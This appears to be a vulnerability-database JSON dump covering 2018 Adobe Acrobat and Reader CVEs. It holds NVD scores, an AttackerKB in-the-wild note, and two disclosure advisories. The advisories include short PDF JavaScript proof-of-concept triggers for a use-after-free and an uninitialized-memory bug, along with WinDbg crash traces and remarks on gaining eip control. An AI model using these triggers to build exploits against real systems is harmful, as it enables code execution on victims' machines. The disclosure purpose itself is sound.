"id": "CVE-2018-4976", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4976", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:adobe:acrobat_reader_dc:15.006.30417:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:15.006.30417:*:*:*:classic:*:*:*"]}, {"lastseen": "2020-12-09T20:25:44", "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have a Use-after-free vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-09T19:29:00", "title": "CVE-2018-4958", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4958"], "modified": 
"2019-08-21T16:20:00", "cpe": ["cpe:/a:adobe:acrobat_reader_dc:17.011.30079", "cpe:/a:adobe:acrobat_reader_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:17.011.30079", "cpe:/a:adobe:acrobat_dc:15.006.30417", "cpe:/a:adobe:acrobat_reader_dc:15.006.30417"], "id": "CVE-2018-4958", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4958", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:acrobat_reader_dc:15.006.30417:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:15.006.30417:*:*:*:classic:*:*:*"]}, {"lastseen": "2020-12-09T20:25:44", "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have a Heap Overflow vulnerability. 
Successful exploitation could lead to arbitrary code execution in the context of the current user.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-09T19:29:00", "title": "CVE-2018-4984", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4984"], "modified": "2020-08-24T17:37:00", "cpe": [], "id": "CVE-2018-4984", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4984", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:44", "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have a Heap Overflow vulnerability. 
Successful exploitation could lead to arbitrary code execution in the context of the current user.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-09T19:29:00", "title": "CVE-2018-4968", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4968"], "modified": "2020-08-24T17:37:00", "cpe": [], "id": "CVE-2018-4968", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4968", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:44", "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have a Use-after-free vulnerability. 
Successful exploitation could lead to arbitrary code execution in the context of the current user.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-09T19:29:00", "title": "CVE-2018-4961", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4961"], "modified": "2019-08-21T16:20:00", "cpe": ["cpe:/a:adobe:acrobat_reader_dc:17.011.30079", "cpe:/a:adobe:acrobat_reader_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:17.011.30079", "cpe:/a:adobe:acrobat_dc:15.006.30417", "cpe:/a:adobe:acrobat_reader_dc:15.006.30417"], "id": "CVE-2018-4961", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4961", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:acrobat_reader_dc:15.006.30417:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30079:*:*:*:classic:*:*:*", 
"cpe:2.3:a:adobe:acrobat_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:15.006.30417:*:*:*:classic:*:*:*"]}], "attackerkb": [{"lastseen": "2020-11-22T06:09:58", "bulletinFamily": "info", "cvelist": ["CVE-2018-4990"], "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have a Double Free vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 2:57am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-07-24T00:00:00", "published": "2018-07-09T00:00:00", "id": "AKB:F655D7DB-2168-466C-BE67-0F0908306BE4", "href": "https://attackerkb.com/topics/pebPc32RaZ/cve-2018-4990", "type": "attackerkb", "title": "CVE-2018-4990", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2018-06-08T07:10:05", "description": "### Summary\r\nA specific Javascript script embedded in a PDF file can lead to a pointer to previously freed object to be reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. 
In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.\r\n\r\n### Tested Versions\r\nAdobe Acrobat Reader DC 2018.009.20044\r\n\r\n### Product URLs\r\nhttps://get.adobe.com/reader/\r\n\r\n### CVSSv3 Score\r\n7.1 - CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-416: Use After Free\r\n\r\n### Details\r\nAdobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. Adobe Acrobat Reader DC supports embedded Javascript scripts in the PDF to allow for interactive PDF forms. This gives the potential attacker the ability to precisely control memory layout and poses additional attack surface. When executing the following piece of Javascript in a suitable PDF document, a Use-After-Free condition can be triggered:\r\n```\r\ntry{this.Net.Discovery.queryServices( \"\", {} ); }catch(e){app.alert(e);}\r\n```\r\n\r\nWith page heap enabled, this leads to a crash:\r\n```\r\neax=17a6acb8 ebx=29464fe0 ecx=29464fe0 edx=771f6c74 esi=2a064fd8 edi=2a064fd0\r\neip=520e2961 esp=0031f01c ebp=0031f02c iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\nAnnots!PlugInMain+0x9ea60:\r\n520e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29464ff8=????????\r\n0:000>\r\n```\r\n\r\nThe memory pointed to by `ebx` is freed and invalid, leading to a crash. The method `Net.Discovery.queryServices` requires privileges, and by default it would be blocked by security permissions. But if the source of the document is trusted, it will execute without problems and lead to a crash. In order to trigger a crash, the first argument needs to be an invalid service name. 
An empty string suffices.\r\n\r\nIf we track back the allocations, we can see that pointer in `ebx` is actually used as `this` in previous function calls. The pointer in `ebx` actually comes from an array of size 0x30 allocated at `Annots!PlugInMain+0x4c01`:\r\n```\r\n0:000> !heap -p -a eax\r\n address 292c2fd0 found in\r\n _DPH_HEAP_ROOT @ 191000\r\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\r\n 292215b0: 292c2fd0 30 - 292c2000 2000\r\n 6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\r\n 77276206 ntdll!RtlDebugAllocateHeap+0x00000030\r\n 7723a127 ntdll!RtlpAllocateHeap+0x000000c4\r\n 77205950 ntdll!RtlAllocateHeap+0x0000023a\r\n 62f8ed43 MSVCR120!malloc+0x00000049\r\n 55848b02 Annots!PlugInMain+0x00004c01\r\n 55848ab1 Annots!PlugInMain+0x00004bb0\r\n 55a4ba1b Annots!PlugInMain+0x00207b1a\r\n 558e1e29 Annots!PlugInMain+0x0009df28\r\n 558e2308 Annots!PlugInMain+0x0009e407\r\n 56b4267d EScript!mozilla::HashBytes+0x0004201b\r\n 56b275b6 EScript!mozilla::HashBytes+0x00026f54\r\n 56b217c2 EScript!mozilla::HashBytes+0x00021160\r\n 56b205f0 EScript!mozilla::HashBytes+0x0001ff8e\r\n 56b204fb EScript!mozilla::HashBytes+0x0001fe99\r\n 56b20442 EScript!mozilla::HashBytes+0x0001fde0\r\n 56b09e18 EScript!mozilla::HashBytes+0x000097b6\r\n 56b48697 EScript!mozilla::HashBytes+0x00048035\r\n 56b4841a EScript!mozilla::HashBytes+0x00047db8\r\n 56b47e8d EScript!mozilla::HashBytes+0x0004782b\r\n 56b46d7f EScript!mozilla::HashBytes+0x0004671d\r\n 56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d\r\n 6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf\r\n 60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd\r\n 601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31\r\n 5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618\r\n 5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16\r\n 601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a\r\n 5fc6426f 
AcroRd32!PDAlternatesGetCosObj+0x0001d51f\r\n 5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b\r\n 5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b\r\n 5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231\r\n```\r\nSetting a write access breakpoint on the dword where the final dereferenced pointer is stored reveals where it comes from:\r\n```\r\n0:000> ba w 4 292c2ffc\r\n0:000> dd 292c2ffc\r\n0:000> g\r\nBreakpoint 6 hit\r\neax=29d26fe0 ebx=29d26fe0 ecx=55a494c0 edx=771f6c74 esi=28a2cff8 edi=292c2fd0\r\neip=55a49408 esp=0018c9e4 ebp=0018ca0c iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\r\nAnnots!PlugInMain+0x205507:\r\n55a49408 e86941e0ff call Annots!PlugInMain+0x9675 (5584d576)\r\n0:000> dd 292c2ffc\r\n292c2ffc 29d26fe0 ???????? ???????? ????????\r\n0:000> !heap -p -a 29d26fe0\r\n address 29d26fe0 found in\r\n _DPH_HEAP_ROOT @ 191000\r\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\r\n 2a3221d4: 29d26fe0 1c - 29d26000 2000\r\n 6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\r\n 77276206 ntdll!RtlDebugAllocateHeap+0x00000030\r\n 7723a127 ntdll!RtlpAllocateHeap+0x000000c4\r\n 77205950 ntdll!RtlAllocateHeap+0x0000023a\r\n 62f8ed43 MSVCR120!malloc+0x00000049\r\n 55848b02 Annots!PlugInMain+0x00004c01\r\n 55848ab1 Annots!PlugInMain+0x00004bb0\r\n 558e22e7 Annots!PlugInMain+0x0009e3e6\r\n 56b4267d EScript!mozilla::HashBytes+0x0004201b\r\n 56b275b6 EScript!mozilla::HashBytes+0x00026f54\r\n 56b217c2 EScript!mozilla::HashBytes+0x00021160\r\n 56b205f0 EScript!mozilla::HashBytes+0x0001ff8e\r\n 56b204fb EScript!mozilla::HashBytes+0x0001fe99\r\n 56b20442 EScript!mozilla::HashBytes+0x0001fde0\r\n 56b09e18 EScript!mozilla::HashBytes+0x000097b6\r\n 56b48697 EScript!mozilla::HashBytes+0x00048035\r\n 56b4841a EScript!mozilla::HashBytes+0x00047db8\r\n 56b47e8d EScript!mozilla::HashBytes+0x0004782b\r\n 56b46d7f EScript!mozilla::HashBytes+0x0004671d\r\n 56bb622c 
EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d\r\n 6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf\r\n 60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd\r\n 601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31\r\n 5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618\r\n 5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16\r\n 601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a\r\n 5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f\r\n 5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b\r\n 5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b\r\n 5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231\r\n 5fb860d4 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014ba4\r\n 5fb85688 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014158\r\n```\r\nThis 0x1c chunk of memory is subsequently freed but is later reused resulting in a crash:\r\n```\r\n(c20.5e8): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=17d2acb8 ebx=29d26fe0 ecx=29d26fe0 edx=771f6c74 esi=292c2fd8 edi=292c2fd0\r\neip=558e2961 esp=0018eee8 ebp=0018eef8 iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\nAnnots!PlugInMain+0x9ea60:\r\n558e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29d26ff8=????????\r\n0:000> dd ebx\r\n29d26fe0 ???????? ???????? ???????? ????????\r\n29d26ff0 ???????? ???????? ???????? ????????\r\n29d27000 ???????? ???????? ???????? ????????\r\n29d27010 ???????? ???????? ???????? ????????\r\n29d27020 ???????? ???????? ???????? ????????\r\n29d27030 ???????? ???????? ???????? ????????\r\n29d27040 ???????? ???????? ???????? ????????\r\n29d27050 ???????? ???????? ???????? ????????\r\n```\r\n\r\nWith page heap disabled, this stale pointer dereference will usually succeed and result in further memory corruption. 
With proper memory layout manipulation, it could be abused to achieve arbitrary code execution.\r\n\r\nDo note that in order for the PoC to trigger this memory corruption, the PoC file needs to be added to the trusted locations list in \u201cSecurity(Enhanced)\u201d in preferences.\r\n\r\n### Timeline\r\n* 2018-01-23 - Vendor Disclosure\r\n* 2018-05-15 - Public Release", "published": "2018-05-17T00:00:00", "type": "seebug", "title": "Adobe Acrobat Reader DC Net.Discovery.queryServices Remote Code Execution Vulnerability(CVE-2018-4996)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4996"], "modified": "2018-05-17T00:00:00", "id": "SSV:97293", "href": "https://www.seebug.org/vuldb/ssvid-97293", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": ""}, {"lastseen": "2018-06-08T07:10:06", "description": "### Summary\r\nA specific Javascript script embedded in a PDF file can lead to a pointer to a previously freed object being reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.\r\n\r\n### Tested Versions\r\nAdobe Acrobat Reader DC 2018.009.20044\r\n\r\n### Product URLs\r\nhttps://get.adobe.com/reader/\r\n\r\n### CVSSv3 Score\r\n6.8 - CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-908: Use of Uninitialized Resource\r\n\r\n### Details\r\nAdobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. 
The method calls required to trigger this vulnerability are privileged and can only be called from trusted functions.\r\n\r\nAdobe Acrobat Reader DC supports embedded Javascript scripts in the PDF to allow for interactive PDF forms. This gives the potential attacker the ability to precisely control memory layout and poses additional attack surface.\r\n\r\nWhile executing the following piece of javascript code, a specific condition leading to memory corruption can occur (it should be noted that all three of these lines require higher privileges, meaning they must be executed in a trusted PDF file):\r\n```\r\nvar a = this.Collab.drivers;\r\nthis.SetRSSMethods( ); \r\nthis.ANFancyAlertImpl(this);\r\n```\r\n\r\nUpon calling `this.ANFancyAlertImpl(this)` a memory object will be allocated. The pointer to this object is later passed to other functions without it being initialized. This leads to undefined behaviour that depends on the previous contents of the same memory region, leading to memory corruption and ultimately to arbitrary code execution.\r\n\r\nTwo pointers from the object end up being used as the second two arguments in a `memcpy` call which can easily be abused to cause a heap-based buffer overflow:\r\n```\r\n(660.8f0): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\nDC\\Reader\\plug_ins\\Annots.api\r\nReader DC\\Reader\\plug_ins\\Annots.api - \r\neax=81818180 ebx=c0c0c0c0 ecx=c0c0c0c0 edx=c0c0c0c0 esi=c0c0c0c0 edi=36dbafe0\r\neip=645ff26d esp=001ac70c ebp=001ac738 iopl=0 nv up ei pl nz na po cy\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210203\r\nMSVCR120!memcpy+0x2a:\r\n645ff26d f3a4 rep movs byte ptr es:[edi],byte ptr [esi]\r\n0:000> k\r\n # ChildEBP RetAddr \r\n00 001ac710 7748e62e MSVCR120!memcpy+0x2a [f:\\dd\\vctools\\crt\\crtw32\\string\\i386\\memcpy.asm @ 188] \r\nWARNING: Stack unwind information not available. 
Following frames may be wrong.\r\n01 001ac738 7748e5a2 Annots!PlugInMain+0xa72d\r\n02 001ac760 7748e3c6 Annots!PlugInMain+0xa6a1\r\n03 001ac770 776412e1 Annots!PlugInMain+0xa4c5\r\n04 001ac780 774f7258 Annots!PlugInMain+0x1bd3e0\r\n05 001ac7ac 570bd6b2 Annots!PlugInMain+0x73357\r\n06 001ac81c 570c1c35 EScript!mozilla::HashBytes+0x2d050\r\n07 001ac84c 5709387b EScript!mozilla::HashBytes+0x315d3\r\n08 001ac8dc 570932df EScript!mozilla::HashBytes+0x3219\r\n09 001ac8f8 570bd21d EScript!mozilla::HashBytes+0x2c7d\r\n0a 001ac944 570bd1b0 EScript!mozilla::HashBytes+0x2cbbb\r\n```\r\n\r\nStepping back a couple of function calls reveals where the `memcpy` arguments come from:\r\n```\r\n0:000> bp Annots!PluginMain+0x1bd3db b\r\nbreakpoint 0 redefined\r\n0:000> g\r\nBreakpoint 0 hit\r\neax=267eef94 ebx=00000000 ecx=0030c438 edx=77898090 esi=1f266fc0 edi=2902efb8\r\neip=776412dc esp=0030c414 ebp=0030c41c iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246\r\nAnnots!PlugInMain+0x1bd3db:\r\n776412dc e8cdd0e4ff call Annots!PlugInMain+0xa4ad (7748e3ae)\r\n0:000> u eip-1\r\nAnnots!PlugInMain+0x1bd3da:\r\n776412db 50 push eax\r\n776412dc e8cdd0e4ff call Annots!PlugInMain+0xa4ad (7748e3ae)\r\n776412e1 8b4508 mov eax,dword ptr [ebp+8]\r\n776412e4 8be5 mov esp,ebp\r\n776412e6 5d pop ebp\r\n776412e7 c20400 ret 4\r\n776412ea 55 push ebp\r\n776412eb 8bec mov ebp,esp\r\n0:000> dd poi(eax)\r\n26a5efe8 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0\r\n26a5eff8 c0c0c0c0 c0c0c0c0 ???????? ????????\r\n26a5f008 ???????? ???????? ???????? ????????\r\n26a5f018 ???????? ???????? ???????? ????????\r\n26a5f028 ???????? ???????? ???????? ????????\r\n26a5f038 ???????? ???????? ???????? ????????\r\n26a5f048 ???????? ???????? ???????? ????????\r\n26a5f058 ???????? ???????? ???????? 
????????\r\n0:000> !heap -p -a poi(eax)\r\n address 26a5efe8 found in\r\n _DPH_HEAP_ROOT @ 61000\r\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\r\n 26954750: 26a5efb8 48 - 26a5e000 2000\r\n 6ac68e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\r\n 77276206 ntdll!RtlDebugAllocateHeap+0x00000030\r\n 7723a127 ntdll!RtlpAllocateHeap+0x000000c4\r\n 77205950 ntdll!RtlAllocateHeap+0x0000023a\r\n 6326ed43 MSVCR120!malloc+0x00000049 [f:\\dd\\vctools\\crt\\crtw32\\heap\\malloc.c @ 92]\r\n 6326ee1c MSVCR120!operator new+0x0000001d [f:\\dd\\vctools\\crt\\crtw32\\heap\\new.cpp @ 59]\r\n 7748a048 Annots!PlugInMain+0x00006147\r\n 7748a00b Annots!PlugInMain+0x0000610a\r\n 7748daea Annots!PlugInMain+0x00009be9\r\n 774890a1 Annots!PlugInMain+0x000051a0\r\n 7748f546 Annots!PlugInMain+0x0000b645\r\n 774a5069 Annots!PlugInMain+0x00021168\r\n 7763d75e Annots!PlugInMain+0x001b985d\r\n 515db634 EScript!mozilla::HashBytes+0x0004afd2\r\n 515db51f EScript!mozilla::HashBytes+0x0004aebd\r\n 7763d6ab Annots!PlugInMain+0x001b97aa\r\n 774a5069 Annots!PlugInMain+0x00021168\r\n 7763d75e Annots!PlugInMain+0x001b985d\r\n 515db634 EScript!mozilla::HashBytes+0x0004afd2\r\n 515db51f EScript!mozilla::HashBytes+0x0004aebd\r\n 7763d6ab Annots!PlugInMain+0x001b97aa\r\n 774a5069 Annots!PlugInMain+0x00021168\r\n 774a4f71 Annots!PlugInMain+0x00021070\r\n 7762aaa2 Annots!PlugInMain+0x001a6ba1\r\n 7762aad8 Annots!PlugInMain+0x001a6bd7\r\n 77626588 Annots!PlugInMain+0x001a2687\r\n 7762af80 Annots!PlugInMain+0x001a707f\r\n 51f8ab90 AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3210\r\n 515d267d EScript!mozilla::HashBytes+0x0004201b\r\n 515b75b6 EScript!mozilla::HashBytes+0x00026f54\r\n 515b17c2 EScript!mozilla::HashBytes+0x00021160\r\n 515b05f0 EScript!mozilla::HashBytes+0x0001ff8e\r\n```\r\n\r\nIn the above debugging log, we break at `Annots!PluginMain+0x1bd3db` to reveal `eax` being passed as argument to the function call points to a newly allocated and uninitialized buffer. 
With page heap enabled, the contents of the allocated memory will be filled with `0xc0c0c0c0`.\r\n\r\nThe code and memory layout after corruption just happen to line up in such a way to allow for easy `eip` control by simply adjusting the size and contents of environment variables:\r\n```\r\n# set AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=AAAAAAAAAAAAAAAAAAAAAAAA....\r\n# cdb \"c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" \"c:\\Users\\user\\Desktop\\js_memcpy_min.pdf\"\r\nMicrosoft (R) Windows Debugger Version 10.0.15063.468 X86\r\nCopyright (c) Microsoft Corporation. All rights reserved.\r\n\r\n\r\nCommandLine: \"c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" \"c:\\Users\\user\\Desktop\\js_memcpy_min.pdf\"\r\nSymbol search path is: srv*\r\nExecutable search path is:\r\nModLoad: 013b0000 015d5000 AcroRd32.exe\r\nModLoad: 771b0000 772f2000 ntdll.dll\r\nModLoad: 75d80000 75e55000 C:\\Windows\\system32\\kernel32.dll\r\nModLoad: 75340000 7538b000 C:\\Windows\\system32\\KERNELBASE.dll\r\nModLoad: 75690000 75759000 C:\\Windows\\system32\\USER32.dll\r\nModLoad: 75400000 7544e000 C:\\Windows\\system32\\GDI32.dll\r\nModLoad: 75f50000 75f5a000 C:\\Windows\\system32\\LPK.dll\r\nModLoad: 75450000 754ed000 C:\\Windows\\system32\\USP10.dll\r\nModLoad: 758d0000 7597c000 C:\\Windows\\system32\\msvcrt.dll\r\nModLoad: 75f60000 76001000 C:\\Windows\\system32\\ADVAPI32.dll\r\nModLoad: 761b0000 761c9000 C:\\Windows\\SYSTEM32\\sechost.dll\r\nModLoad: 75550000 755f2000 